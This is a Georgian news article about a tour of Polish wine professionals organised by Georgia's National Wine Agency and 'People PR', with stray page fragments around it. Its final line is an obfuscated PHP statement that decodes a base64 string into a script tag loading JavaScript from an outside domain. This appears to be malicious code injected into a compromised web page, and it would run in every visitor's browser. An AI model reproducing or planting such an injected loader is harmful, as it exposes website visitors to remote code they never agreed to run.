celsiusi
ავერსი საქკაბელი

 პოლონეთის ბაზარზე ქართული ღვინის ექსპორტის ზრდის ხელშეწყობის მიზნით, ღვინის ეროვნული სააგენტოს და სააგენტოს კონტრაქტორი მარკეტინგული კომპანიის "People PR" ორგანიზებით, საქართველოში პოლონელი ღვინის პროფესიონალების ტური ჩატარდა. ამის შესახებ საინფორმაციო სააგენტო "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს. 

მათივე ცნობით, ათკაციანი ჯგუფის შემადგენლობაში იყვნენ კომერციული სექტორის და კონტრაქტორი მარკეტინგული კომპანიის “People PR” წარმომადგენლები. ტურის ფარგლებში, სტუმრები კახეთის რეგიონში იმყოფებოდნენ, სადაც ქართული ღვინის მწარმოებელი კომპანიები დაათვალიერეს, ღვინის დაყენების ტექნოლოგიას გაეცნენ, ადგილზე დააგემოვნეს როგორც კლასიკური წესით, ასევე ტრადიციული მეთოდით დამზადებულ ქართული ღვინოები.
 
პოლონელი სტუმრებისთვის, თბილისში ქართული ღვინის დეგუსტაცია, ე.წ. „Walkaround Tasting“ გაიმართა; დეგუსტაციაზე წარმოდგენილი იყო ქართული ღვინის მწარმოებელი 30 კომპანიის სხვადასხვა ღვინო. ქართველმა ღვინის მწარმოებლებმა შეფასებები და რეკომენდაციები მიიღეს პოლონელი პროფესიონალებისგან.
 
პოლონეთი ქართული ღვინის ერთ-ერთ სტრატეგიულ ბაზარს წარმოადგენს, რომელმაც უკვე წლებია ქართული ღვინის ექსპორტიორი ქვეყნების ხუთეულში სტაბილურად დაიმკვიდრა ადგილი. აღნიშნულ ქვეყანაში ღვინის ეროვნული სააგენტოს ფინანსური და ორგანიზაციული მხარდაჭერით, წლის განმავლობაში, სხვადასხვა მარკეტინგული ღონისძიება ხორციელდება.
290
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");